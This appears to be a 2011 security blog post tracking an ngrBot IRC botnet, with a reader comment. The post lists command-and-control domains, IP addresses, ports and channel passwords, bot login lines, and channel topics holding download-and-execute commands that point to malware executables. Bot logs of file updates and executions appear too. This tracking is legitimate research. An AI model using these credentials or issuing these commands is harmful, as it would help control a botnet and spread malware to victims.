dem0002.in(ngrBot hosted in United States Hollywood Exclusive Proxy Llc)

By Pig, November 11, 2011

Big hecker=>big botnet=>easy to trace
Same guy named google hf hecker
servers used for botnets mostly hosted from razorservers.com USA lol

Botnet size estimated around 60-80k

Resolved : [dem0002.in] To [70.34.194.26]
Resolved : [dem0002.in] To [70.34.196.90]
Resolved : [dem0002.in] To [66.199.249.154]
Resolved : [dem0002.in] To [70.34.196.146]

Other domain in stock for the moment waiting to be used from the hecker:
dem0001.in

70.34.194.26 1888 PASS strike
70.34.196.90 1888 PASS strike
66.199.249.154 1888 PASS strike
70.34.196.146 1888 PASS strike

NICK n{US|XPa}vihzehv
USER vihzehv 0 0 :vihzehv
JOIN #asdf strike
JOIN ##center 1963.g3rb3rs1t0.3691
JOIN #XP
JOIN #US

Now talking in #asdf
Topic On: [ #asdf ] [ ~pu http://dc311.4shared.com/download/jcd_Wyv-/sfgsdf.exe d81906eb277dba2945752b014787eb8a ~s -o ~s ]
Topic By: [ google ]

Now talking in #xp
Topic On: [ #xp ] [ ~dw http://img104.herosh.com/2011/11/10/881459967.gif 84d44f329fb3dde5cdf17c0187b5507f ]
Topic By: [ google ]

UPDATE:
New domain :dem0003.in

Resolved : [dem0003.in] To [70.34.196.146]
Resolved : [dem0003.in] To [70.34.194.26]
Resolved : [dem0003.in] To [70.34.196.90]
Resolved : [dem0003.in] To [66.199.249.154]

UPDATE:
Remote Host Port Number
199.15.234.7 80
70.34.196.146 1889 PASS mflrod

NICK n{US|XPa}jjywrvd
USER jjywrvd 0 0 :jjywrvd
JOIN #qwer mflrod

UPDATE:
208.83.233.194 1889 PASS mflrod

PRIVMSG #XP :[d=”http://hotfile.com/dl/146056776/3f165a5/10feb.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0
PRIVMSG #XP :[d=”http://hotfile.com/dl/146056926/fdc2c38/hgds.exe” s=”86016 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.exe” – Download retries: 0
NICK n{US|XPa}kmbqvny
USER kmbqvny 0 0 :kmbqvny
JOIN #zxcv mflrod
JOIN #XP
JOIN #US

UPDATE:
Remote Host Port Number
199.15.234.7 80
67.219.122.34 1888 PASS ngrBot

NICK n{US|XPa}zggednf
USER zggednf 0 0 :zggednf
JOIN ##center 1963.g3rb3rs1t0.3691

Now talking in ##center
Topic On: [ ##center ] [ ~pu http://hotfile.com/dl/146860597/0a721e9/17feb.exe ca04a7cebffaa9f90511b388be3dd839 -r ]
Topic By: [ google ]
Modes On: [ ##center ] [ +smntMu ]
Topic: google sets topic [~pu http://hotfile.com/dl/146860597/0a721e9/17feb.exe ca04a7cebffaa9f90511b388be3dd839 -r]

Now talking in #asdf
Topic On: [ #asdf ] [ ~pu http://hotfile.com/dl/146860597/0a721e9/17feb.exe ca04a7cebffaa9f90511b388be3dd839 -r ]
Topic By: [ google ]
Modes On: [ #asdf ] [ +smntMu ]

Hosting infos:
http://whois.domaintools.com/70.34.196.146

Categories: Uncategorized

1 Comment

Anonymous - November 12, 2011 at 1:46 pm

#asdf
* Topic is '~pu http://dc426.4shared.com/download/5mQAOJxS/sdfsfiiio.exe 5b209a1e8009452fef10b6bacb7a17dc ~s -o ~s'

* Now talking in #xp
* Topic is '~dw http://img105.herosh.com/2011/11/11/278955693.gif d1616ed4b924f29ff42143cdd1c9058f'

Comments are closed